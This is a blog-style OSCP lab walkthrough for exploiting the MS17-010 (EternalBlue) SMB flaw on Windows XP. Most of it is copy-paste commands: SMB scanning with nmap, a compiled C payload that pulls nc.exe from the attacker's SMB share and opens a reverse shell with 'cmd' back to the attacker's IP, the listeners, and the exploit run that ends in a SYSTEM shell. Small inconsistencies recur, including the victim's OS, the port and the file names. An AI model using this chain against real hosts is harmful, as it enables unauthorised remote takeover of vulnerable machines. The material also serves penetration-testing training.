Exploit Eternal Blue (MS17–010) for Windows XP with custom payload

Summary

This article shows you how to exploit the MS17–010 vulnerability on Windows XP .

Disclaimer

This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Details

Why this post?

During my OSCP training I had a lot of trouble rooting XP target ‘Xlicx in Wonderland’. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.

This walkthrough has been prepared in such a way that it should always work on any system running on Windows XP or Windows 2000 ('JD') and vulnerable for MS17–010.

Our final payload will be an executable file that:
- will setup a netcat reverse shell (port 8080)

The POC consists of two machines: the victim (Windows 7 64bits) and an attacker machine (Kali Linux 2022.1).

victim:
- Windows XP Professional SP3
- IP address: 192.168.62.149
- Security: Default Windows firewall = ON
- File and Print sharing = enabled

Attacker (for reverse shell):
- Kali Linux
- IP-Address: 192.168.62.161

In this guide I use the term 'kali' and 'LHOST interchangeably (we will use variables ‘kali’ or ‘LHOST’). You can change this address to your needs and copy + paste the code inside a Bash Terminal.

Prerequisites

We start by installing preconditions that must be in place before we can run the exploit.

1. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).

cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R

2. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Install the virtualenv tool.

sudo apt install virtualenv

3. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start a python2 virtual enviroment inside the Impacket directory

cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate

Note: If you get a Python file not found error, just execute the command once more and it will work.

Result: you should have a prompt changed to ‘(impacket-venv)’.

4. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2

cd /tmp                                                                                                                                               
wget  https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py

5. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the python2 virtual environment ‘(impacket-venv)’, install Impacket requirements.

cd /opt/impacket
pip install -r requirements.txt
pip install .

Enumeration.

Now that you have updated your system with the requirements to run the exploit, you can start scanning the target machine (Windows XP in our case).

1. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Use nmap to scan the target machine for SMB vulnerabilities.

cd /usr/share/nmap/scripts
target=192.168.62.149
p=445
scriptargs='smbpass=','smbdomain=mydomain.com','unsafe=1'
for script in $(ls smb* | grep -v -e brute -e flood); do echo "=== $script ==="; sudo nmap $(echo $target) -script=$script -script-args="${scriptargs}" -p $p| grep "|" ; done

Our target machine is vulnerable for MS17–010!

Payload creation (for Windows XP)

Our final payload will be an executable file that:

- Will setup a netcat reverse shell (port 443)

Everything we need to run the exploit is copied to the /tmp directory on Kali. This directory will be made available with the Python simple HTTP Server.

7. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Copy and paste the C code below to create source file /tmp/backup.c. Adjust the value for 'kali=' to your Kali IP-address.

kali=192.168.62.161
portnc2=8080
cd /tmp
echo '#include <stdlib.h>'> testexe.c
echo 'int main ()' >> testexe.c
echo '{' >> testexe.c
echo 'int i;' >> testexe.c
echo i = system \(\"START /B \\\\\\\\\\\\\\$kali\\\\\\smb\\\\\\\\nc.exe $kali $portnc2 -e cmd\"\)\; >> testexe.c
echo 'return 0;' >> testexe.c
echo '}' >> testexe.c

Result is source file /tmp/testexe.c

8. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Compile /tmp/testexec.c to /tmp/ruby.exe (ruby-xp.exe is arbitriary, it can be something else if you want).

/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby-xp.exe
/usr/bin/i686-w64-mingw32-strip /tmp/ruby-xp.exe

You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby-xp.exe).

Netcat reverse shell payload

Our final payload file (ruby.exe) will setup a netcat reverse shell on TCP port 8080. This is done by the following lines of code:

i = system (“START /B \\\\192.168.62.161\\smb\\nc.exe 192.168.62.161 8080 -e cmd”);

9. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Copy netcat to staging directory (/tmp)

cp /usr/share/windows-resources/binaries/nc.exe /tmp

Set up the required listeners

Next open a new instance of Bash Terminal. Open a new tab for each “listener”. You will need 5 open tabs for all required listeners.

10. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Set up a SMB stager in order to download essential files to the target.

sudo impacket-smbserver -ip 192.168.62.161 -port 445 smb /tmp/

11. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start a netcat listener on port 8080to catch the netcat connection

rlwrap nc -nlvp 8080

Prepare MS17–010 exploit

We have now made our preparations for the payload. The next section is about running the actual exploit. Open a new Bash Terminal instance to execute the commands.

12. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Download the exploit.

cd /tmp
git clone https://github.com/helviojunior/MS17-010.git

13. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start a Python2 environment inside the Impacket folder

cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate

14. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the Python2 environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.149) with our payload file (/tmp/ruby-xp.exe).

python2 /tmp/MS17-010/send_and_execute.py 192.168.62.149 /tmp/ruby-xp.exe

Ignore the error ERROR_SERVICE_TIMEOUT

Check out our results:

SMB listener

An SMB connection is established.

Netcat listener

We have a SYSTEM shell!

In my next blog, I will focus more on exploiting Active Directory. I will show you how to use PowerShell Empire as alternative for mimikatz.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!